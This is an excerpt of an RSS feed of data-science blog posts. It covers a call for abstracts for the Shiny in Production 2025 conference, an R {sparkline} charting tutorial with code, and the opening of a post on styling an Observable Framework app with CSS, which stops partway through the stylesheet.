For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Call for Abstracts</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/</link><pubDate>Mon, 17 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts now open&lt;/h3&gt;
&lt;p&gt;We are excited to announce the Call for Abstracts for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025&lt;/a&gt;, to be held on 8th-9th October 2025 in Newcastle upon Tyne, UK. This event brings together industry experts, data scientists, and developers to explore the latest advancements and best practices in deploying Shiny applications in production settings.&lt;/p&gt;
&lt;h3 id="about-the-conference"&gt;About the Conference&lt;/h3&gt;
&lt;p&gt;As Shiny continues to revolutionise data visualisation and interactive web applications, the need for robust, scalable, and efficient production environments is more critical than ever. This conference aims to address these needs by providing a platform for knowledge sharing, collaboration, and innovation.&lt;/p&gt;
&lt;p&gt;Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI &amp;amp; Machine Learning in Shiny:&lt;/strong&gt; Integrating predictive models, LLMs, and generative AI into Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny for Large Enterprises:&lt;/strong&gt; How big companies successfully deploy and maintain Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storytelling with Shiny:&lt;/strong&gt; Making complex data insights accessible through compelling visual narratives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny vs. Other Web Frameworks:&lt;/strong&gt; A comparison of when and why to choose Shiny over alternatives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Beyond Dashboards / Creative Uses of Shiny:&lt;/strong&gt; Exploring non-traditional applications like simulations, process automation, and interactive reports.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Python Shiny apps&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022,&lt;/a&gt; &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt; and
&lt;a href="https://www.youtube.com/watch?v=8mLFQUwnU5g&amp;list=PLbARZQfpqIKK3fHYTo__ZY-IIsF2eiE0X" rel="external"&gt;2024&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59PM on 20th March 2025.&lt;/li&gt;
&lt;li&gt;Submission portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/WnGwkqYy" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract submission deadline: 20th March 2025&lt;/li&gt;
&lt;li&gt;Notification of acceptance: mid-April 2025&lt;/li&gt;
&lt;li&gt;Conference dates: 8th-9th October 2025&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparkline Package for Inline Visualisations</title><link>https://www.jumpingrivers.com/blog/sparkline/</link><pubDate>Thu, 13 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;h3 id="sparkline"&gt;Sparkline&lt;/h3&gt;
&lt;p&gt;This was the introductory part of the blog series, the second part will
be on embedding sparklines in html tables. The CRAN
&lt;a href="https://cran.r-project.org/web/packages/sparkline/readme/README.html" rel="external"&gt;{sparkline}&lt;/a&gt;
package allows you to make small inline html charts using
&lt;a href="https://jquery.com/" rel="external"&gt;jQuery&lt;/a&gt; in R.&lt;/p&gt;
&lt;h4 id="charts-available-with-sparkline"&gt;Charts Available With {sparkline}&lt;/h4&gt;
&lt;p&gt;You can make the following charts with the package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Line&lt;/li&gt;
&lt;li&gt;Bar&lt;/li&gt;
&lt;li&gt;Tristate&lt;/li&gt;
&lt;li&gt;Discrete&lt;/li&gt;
&lt;li&gt;Bullet&lt;/li&gt;
&lt;li&gt;Pie&lt;/li&gt;
&lt;li&gt;Box Plot&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://omnipotent.net/jquery.sparkline/#s-about" rel="external"&gt;omnipotent.net&lt;/a&gt;
website has a great feature for viewing the different types of chart. I
will show a few examples here, along with the code for producing them.&lt;/p&gt;
&lt;p&gt;Note the documentation for all of the different charts is great and can
be found &lt;a href="https://omnipotent.net/jquery.sparkline/#s-docs" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;All of the plots from this package use the &lt;code&gt;sparkline&lt;/code&gt; function, and we
pass the type of chart we want as the &lt;code&gt;type&lt;/code&gt; argument (default is line).
The function will take a vector or list for the &lt;code&gt;values&lt;/code&gt; argument,
depending on the type of chart we are creating this can be either data
to plot or specifications for the plot.&lt;/p&gt;
&lt;p&gt;Note: I am using &lt;code&gt;spk_add_deps&lt;/code&gt; so I can display them in this blog.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-sparkline"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="line"&gt;Line&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;line1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spk_add_deps&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline line chart" width="22%" height="120" src="html_files/line1.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;We can remove the fill and the spots using the following arguments.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;line2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;, spotRadius &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, fillColor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline line chart" width="22%" height="120" src="html_files/line2.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h4 id="bar"&gt;Bar&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bar1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bar chart" width="22%" height="120" src="html_files/bar1.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;We can change the bar colors, spacing and width.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bar2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;, barColor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, barSpacing &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;10&amp;#34;&lt;/span&gt;, barWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bar chart" width="22%" height="120" src="html_files/bar2.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h4 id="box-plots"&gt;Box Plots&lt;/h4&gt;
&lt;p&gt;For box plots, the data passed to the &lt;code&gt;values&lt;/code&gt; argument will be used to
calculate the chart. If you want to pass in pre-computed values like
median, max or min for example, you can do this using the &lt;code&gt;raw = TRUE&lt;/code&gt;
and pass them in as the &lt;code&gt;values&lt;/code&gt; argument.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline boxplot" width="22%" height="120" src="html_files/box.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
&lt;h4 id="bullet-graph"&gt;Bullet Graph&lt;/h4&gt;
&lt;p&gt;This is one of the examples where the &lt;code&gt;values&lt;/code&gt; passed correspond to
specifications for the plot and should be ordered as: target,
performance, range1, range2, range3.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bullet1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bullet graph" width="22%" height="120" src="html_files/bullet1.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bullet2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;, rangeColors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lightgrey&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;slategrey&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bullet graph" width="22%" height="120" src="html_files/bullet2.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
&lt;p&gt;See you in the next blog post about embedding sparklines in html tables.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Porting a Shiny App to Observable Framework: Part 2</title><link>https://www.jumpingrivers.com/blog/shiny-to-observable2/</link><pubDate>Thu, 30 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-to-observable2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-to-observable2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
main aside {
padding: 0.25rem 1rem;
background-color: var(--cream);
border-radius: 10px;
}
ol li {
margin-bottom: 0.25rem;
}
.switch {
color: var(--off-white);
background-color: var(--burgundy);
padding: 0.2em 0.5em;
}
code.switch {
display: block;
margin: 0.5em 0;
width: fit-content;
}
.highlight {
resize: horizontal;
overflow: auto;
}
.resizable .highlight {
resize: both;
height: 250px;
}
.blog-content picture img {
margin-top: 1rem;
}
.blog-content picture ~ p {
margin-top: 0;
}
&lt;/style&gt;
&lt;h2 id="preamble"&gt;Preamble&lt;/h2&gt;
&lt;p&gt;This post, Part 2 in a series of two, looks at styling and deploying the Observable Framework app we built in &lt;a href="https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;Part 1&lt;/a&gt;. Codeblocks with burgundy backgrounds refer to specifc tagged commits in the &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer/tree/main" rel="external"&gt;accompanying GitHub repositiory&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="styling-the-app-with-css"&gt;Styling the App with CSS&lt;/h2&gt;
&lt;p&gt;We can add a stylesheet by referencing it through the &amp;ldquo;style&amp;rdquo; property in the configuration file: observable.config.js. That config file can be used to define various attributes for our project, including what title and favicon should be displayed in the browser tab, where the root of the source code is (&lt;code&gt;root: &amp;quot;src&amp;quot;&lt;/code&gt;) and where, relative to that root, the stylesheet is stored (&lt;code&gt;style: &amp;quot;style/style.css&amp;quot;&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;You can go crazy here with your CSS or keep it simple. Since this is just meant as a quick demonstration we&amp;rsquo;ll do the latter: we&amp;rsquo;ll tweak the appearance of controls, add Jumping Rivers fonts and colours and rearrange the layout for wider screens:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;src/style/style.css&lt;/summary&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-CSS" data-lang="CSS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#7ee787"&gt;url&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fonts.googleapis.com/css2?family=Outfit:wght@100..900&amp;amp;display=swap&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-family&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Outfit&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;sans-serif&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;position&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;relative&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#0c293d&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#fcfbfa&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;grid&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;justify-content&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;align-items&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;column-gap&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-columns&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;350&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-areas&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;title title&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls chart&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls count&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;h1&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-weight&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;600&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: title;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;none&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;unset&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: controls;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
